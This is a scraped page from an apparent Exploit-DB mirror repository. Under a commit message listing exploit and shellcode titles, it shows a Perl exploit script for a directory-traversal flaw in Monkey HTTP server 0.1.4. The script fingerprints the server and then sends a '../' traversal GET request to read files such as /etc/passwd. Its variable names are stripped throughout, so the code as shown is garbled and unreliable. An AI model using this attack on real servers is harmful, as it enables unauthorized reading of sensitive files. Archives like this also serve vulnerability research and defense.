bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/remote/21857.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

71 lines
No EOL
2.2 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/5792/info
Monkey HTTP server is prone to a directory-traversal bug that may allow attackers to access sensitive files.
By passing a malicious query to a vulnerable server, an attacker can potentially gain access to arbitrary webserver-readable files. This issue occurs because the application fails to sufficiently validate the user-supplied input.
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit
#
# Usage:
# perl monkey.pl <hostname> <httpport> <file>
#
# <hostname> - target host
# <httpport> - port on which HTTP daemon is listening
# <file> - file which you wanna get
#
# Example:
# perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
# by DownBload <downbload@hotmail.com>
# Illegal Instruction Labs
#
use IO::Socket;
sub sock () {
= IO::Socket::INET->new (PeerAddr => ,
PeerPort => ,
Proto => "tcp")
|| die "[ ERROR: Can't connect to !!! ]\n\n";
}
sub banner() {
print "[--------------------------------------------------]\n";
print "[ Monkey-0.1.4 reverse traversal exploit ]\n";
print "[ by DownBload <downbload\@hotmail.com> ]\n";
print "[ Illegal Instruction Labs ]\n";
print "[--------------------------------------------------]\n";
}
if (0ARGV != 2)
{
banner();
print "[ Usage: ]\n";
print "[ perl monkey.pl <hostname> <httpport> <file> ]\n";
print "[--------------------------------------------------]\n";
exit(0);
}
= [0];
= [1];
= [2];
banner();
print "[ Connecting to ... ]\n";
sock();
print "[ Sending probe... ]\n";
print "HEAD / HTTP/1.0\n\n";
while ( = <>) { = . ; }
if ( =~ /Monkey/) { print "[ Monkey HTTP server found,
continuing... ]\n"; }
else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
close ();
print "[ Connecting to ... ]\n";
sock();
print "[ Sending GET request... ]\n";
print "GET //../../../../../../../../../ HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while ( = <>) { print ; }
close ();
Reference in a new issue View git blame Copy permalink